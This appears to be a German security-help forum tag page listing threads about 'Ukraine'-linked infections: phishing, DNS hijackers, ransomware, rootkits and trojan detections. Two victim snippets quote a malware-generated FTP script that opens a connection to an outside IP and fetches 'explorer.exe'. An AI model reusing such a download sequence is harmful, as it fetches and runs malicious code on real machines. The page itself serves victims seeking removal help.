Zurück   Trojaner-Board > Themen

Alles zum Thema: Ukraine

  Letzter Beitrag Antworten Hits Forum
Phishing-Mail mit angeblichem H.
Ukraine - Phishing-Mail mit angeblichem Hilferuf Heute erhielt meine Frau eine E-Mail angeblich von einer mit uns bekannten "öffentlichen Person" mit dem Betreff: "Hilfe" und mit folgendem Inhalt: Derselbe angebliche Sender stand heute mit Bild in der Zeitung, weil er gestern einen Vortrag hier in der...
Diskussionsforum
Mehrere Einlogversuche aus verschiedenen Ländern in meine Konten
Ukraine - Hallo liebes Trojaner-Board, seit dem 27. Mai gab es mehrfache Login-Versuche in meinen Steam Account, manchmal auch mehrere am selben Tag immer aus verschiedenen Ländern (z.B. Brasilien, Russland, Ukraine, Malaysia usw.). Dazu kommt noch mein Ubisoft Konto seit dem 21. Juni. Gestern an dem...
Plagegeister aller Art und deren Bekämpfung
IE 11 - kryptische Zeichenfolge in der Adressleiste
Ukraine - Hallo liebe Forummitglieder, mein Problem seit gestern Abend: Nach Installation eines Loaders (jaja, ich weiß :wtf:) hatte ich plötzlich eine Menge Adware auf meinem PC, welche ich aber schnell mit Malwarebytes, Spybot, Bitdefender usw. vernichten konnte. Was aber noch übrig blieb und welches...
Plagegeister aller Art und deren Bekämpfung
Staatstrojaner kommt
Ukraine - Interessanter und höchst beunruhigender Artikel auf "Die ZEIT". "So wie auch viele IT-Sicherheitsexperten befürchtet der Ausschuss, dass die im Gesetz vorgesehenen Befugnisse "zu einer massiven Schwächung der IT-Sicherheitsinfrastruktur und damit auch zu einer Gefährdung der Nutzerinnen und...
Diskussionsforum
Sparkasse Java Script Hack
Ukraine - Mein Vater hatte versucht sich beim Onlinebanking einzuloggen und wurde danach aufgefordert TANs einzugeben. Danach hatte er direkt Rücksprache mit der Kreissparkassen Hotline gehalten. Es hat jemand versucht einen hohen Geldbetrag auf ein ausländisches Konto zu transferieren. Ich habe mir nun...
Plagegeister aller Art und deren Bekämpfung
Rechner von Freundin in Ukraine verseucht> rootkit, viren, und was noch?
Ukraine - Gruss an alle Experten aus der Ukraine! Bin hier gerade bei meiner Freundin zu Besuch und muss ihren Computer nutzen. Der lief bisher mit XP ohne jeglichen Schutz. Es war sehr schwierig ein Anti-Vieren Programm zum laufen zu bringen, jetzt ist NOD32 installiert. Es wurden eine reihe von Viren...
Log-Analyse und Auswertung
Windows entwickelt merkwürdiges Eigenleben
Ukraine - Hallo, neuerdings passiert bei mir folgendes: Zyklisch öffnet der PC unter dem gerade laufendem Programm (z.B. Acrobat Reader) "Datei öffnen" und trägt folgendes als zu öffnenden Dateinamen selbstständig ein : "eq7echo open 176.8.67.48 24546 .. eq7echo user 29085 25577 .. eq 7echo get...
Plagegeister aller Art und deren Bekämpfung
Merkwürdiges Problem unter Windows XP
Ukraine - Hallo, neuerdings passiert bei mir folgendes: Zyklisch öffnet der PC unter dem gerade laufendem Programm (z.B. Acrobat Reader) "Datei öffnen" und trägt folgendes ein : "eq7echo open 176.8.67.48 24546 .. eq7echo user 29085 25577 .. eq 7echo get explorer.exe .. eq 7echo quit .. eq 7ftp ßn ßsöeq...
Alles rund um Windows
Antivirusprogramm hat TR/PSW.AccPhish.B gefunden.....
Ukraine - Antivirusprogramm hat TR/PSW.AccPhish.B gefunden....., was ist das? Ich habe als Antivirusprogramm Avira, der Trojaner wurde heute, 2. Oktober, gefunden. Was soll ich unternehmen, was ist das für ein Trojaner? Ich bin beruflich in der Ukraine, habe Wi-Fi-Anschluss in Kiew, lebe seit drei Jahren...
Log-Analyse und Auswertung
Malwarebytes stoppt nach Neuinstallation ständig zugang zu einer potenziell gefährlichen Webseite
Ukraine - Hallo ich habe mir auf einer Webseite diesen Schädling eingefangen, bei dem der Benutzer gesperrt und man aufgefordert wird x €uro per Paypal zu überweisen. Bislang war ich der Meinung mit Avira und dem Spyware Terminator + Firewall und Routerfirewall recht gut geschützt zu sein. Da ich...
Antiviren-, Firewall- und andere Schutzprogramme
TR/ATRAPS.GEN in C:\Dokumente und Einstellungen\***\Temp\nsk15E.tmp\AccessControl.dll
Ukraine - Hallo zusammen, vor etwa einer Woche meldete mir während des Herunterladens der dm-Fotosoftware der AntiVir-Guard den Trojanerfund von TR/ATRAPS.GEN in C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Temp\nsk15E.tmp\AccessControl.dll. (einige Stunden zuvor hatte ich ein Update an diesem...
Plagegeister aller Art und deren Bekämpfung
Nach Smart HDD Entfernung: Wiederkehr von Fakesysdef.A.5002, Crypt.ULPM.Gen, Trash.Gen
Ukraine - Guten Tag, Ich habe mir vor einigen tagen den Smart HDD Virus eingefangen, nachdem ich törechterweise auf einen link in einer youtube beschreibung geklickt habe. habe diesen virus nach folgender anleitung entfernt: hxxp://www.bleepingcomputer.com/virus-removal/remove-win-hdd soweit so...
Plagegeister aller Art und deren Bekämpfung
Fragen zu TR/ATRPAS.GEN
Ukraine - Hallo! Ich bin neu hier und habe einige allgemeine Fragen zum Thema Trojanerbefall, auf die ich auch nach ausgiebiger Suche keine Antwort gefunden habe. Wem die Vorgeschichte zu lang ist, kann auch gleich die Fragen lesen. Zur Vorgeschichte: Auf meinem alten Rechner (Win XP SP 3,...
Plagegeister aller Art und deren Bekämpfung
BKA Maleware - Auch ich bin betroffen
Ukraine - Hallo, auch mich hat der oben genannte Trojaner erfasst. Heute morgen kam ich nicht mehr rein. Nun schreibe ich über den Laptop meiner Freundin. Mein Laptop ist auch hochgefahren (F8 ---> Start des zuletzt funktionierendes Standes). Inet Verbindung besteht derzeit keine (Sonst geht der Spaß...
Plagegeister aller Art und deren Bekämpfung
Malwarebytes Problemmeldungen - skype.exe / firefox.exe / svchost.exe
Ukraine - Hallo, Ich habe ein Problem mit ständigen Meldungen. Alle paar Minuten erscheinen über meiner Taskleiste Meldungen wie diese: http://s7.directupload.net/images/111226/trfisgbf.jpg Ich habe zahlreiche sehr wichtige Dateien auf meinem Computer, was eine "Renovierung" meiner Festplatte...
Plagegeister aller Art und deren Bekämpfung
Google Suchergebnisse leiten beim Klick auf völlig fremde Seiten weiter (meist Werbung)
Ukraine - Hallo liebes Forum, ich habe seit einiger Zeit das Problem, dass die Google Suchergebnisse nicht die korrekten Internetseiten aufrufen, sondern mich auf völlig fremde Seiten weiterleiten. Meistens handelt es sich dabei um Werbung. Ich habe mich mal hier im Forum durchgelesen und irgendwas...
Log-Analyse und Auswertung
Gewerblicher PC - DNS Einträge 93.188.162.82 93.188.161.222
Ukraine - Hallo, Ich bin zurzeit in einer Schulung, die nichts mit PC zu tun hat. Da dort aber bekannt ist, das ich mit PC's auskenne,wurde ich gefragt, ob ich mal am PC, Windows 2000 nachsehen kann, warum aufgerufene Internetseiten falsch angezeigt werden. Da hatte ich dann diese DNS einträge...
Plagegeister aller Art und deren Bekämpfung
ROOTKIT im BIOS angehängt benutzt MODBOOT.BAT und AUTOEXEC.BAT bei start
Ukraine - Hi, habe ein schwerwiegendes Problem, auf meinem Rechner befinde sich ein Modbot, welches von anfang an auf dem System resistent ist. Mit ein paar Freunden haben wir, nachdem wir den verdacht hatten, dass sich ein Rootkit auf unserem System befindet, denen eine Falle gestellt, sodass wir...
Plagegeister aller Art und deren Bekämpfung
Trojanerverdacht nach Neuinstallation von Windows
Ukraine - Hi, Ich habe folgendes Problem: Da ich gestern keine Updates bei GData ziehen konnte, erinnerte ich mich an mein Problem vom 22.01.2010: http://www.trojaner-board.de/82070-gdata-es-kann-keine-verbindung-zum-update-server-hergestellt-werden.html Mir wurde erklärt, dass mein kompletter...
Plagegeister aller Art und deren Bekämpfung
RECYCLERS-1-... konnte (was auch sonst?) nicht gefunden werden. 6.Ô°(Hm..Na Klasse!)
Ukraine - Hy leute :Boogie: Ick habm Problem. Und das is so: Ick komm voner Party nachhause,mach meinen geliebten Rechner an und starte die Festplatte (G:) vom Desktop aus (Verknüpfung). Sagt der mir plötzlich, in Verbindung mit einem seeehr unangenehmen Ton,... ((*WRUURUMM*)) das hier >>>>> ...
Plagegeister aller Art und deren Bekämpfung
Trojan.Pandex: wirklich weg ?
Ukraine - Hallo liebe community, ich habe mir von einiger Zeit den Virus Trojan.Pandex eingefanden. Sophos (mein Virenproggi) konnte den Virus zwar entfernen aber nach 1-2 Tagen tauchte er wieder in meinem Quarantäne Ordner auf. Nun habe ich auf einer englischen Antiviren Seite gelesen, wie ich den...
Plagegeister aller Art und deren Bekämpfung
Pc neu aufgesetzt
Ukraine - Guten Morgen, Ich habe meinen Pc neu aufgesetzt, da mein gesamter internetverkehr über die ukraine geleitet wurde. Nun habe ich meinen Pc neu aufgesetzt und wollte wissen was ich jetzt am besten mache.Antivir und spybot habe ich installiert und sind auf dem neusten stand.Ich weiß, dass ich noch SP3...
Log-Analyse und Auswertung
Fragen zu DNS-Hijacker/Odessa
Ukraine - Hallo Ein Bekannter hat sich wohl einen DNS-Hijacker/Odessa eingefangen. Zumindest vermute ich das im Augenblick mal. Symptome: - Kein Update von Antivir mehr möglich - Laut Hijack-Log ein DSN mit 85 vorne, welche bei WHOIS Abfrage Ukraine ergibt O17 -...
Plagegeister aller Art und deren Bekämpfung
Umeitung über die Ukraine wie verhindern?
Ukraine - hallo, nach den Horrorberichten hier und in anderen Foren, habe ich mal versucht mit Google und der SuFu hier im Forum meine Fragen beantwortet zu bekommen. Leider nicht richtig. wie kann man verhindern daß der Rechner z.B. mit dem DNS Changer auf die Ukraine umleitet. Reicht zum...
Plagegeister aller Art und deren Bekämpfung
Ukraine trojaner - alles versucht, nichts geklappt
Ukraine - bitte editiere zukünftig deine links, wie es dir u.a. hier angezeigt wird: http://www.trojaner-board.de/22771-aktive-links-und-persoenliche-informationen-hjt-log-files.html#post171958 danke GUA http://www.smilies.4-user.de/include/Berufe/smilie_be_027.gif
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.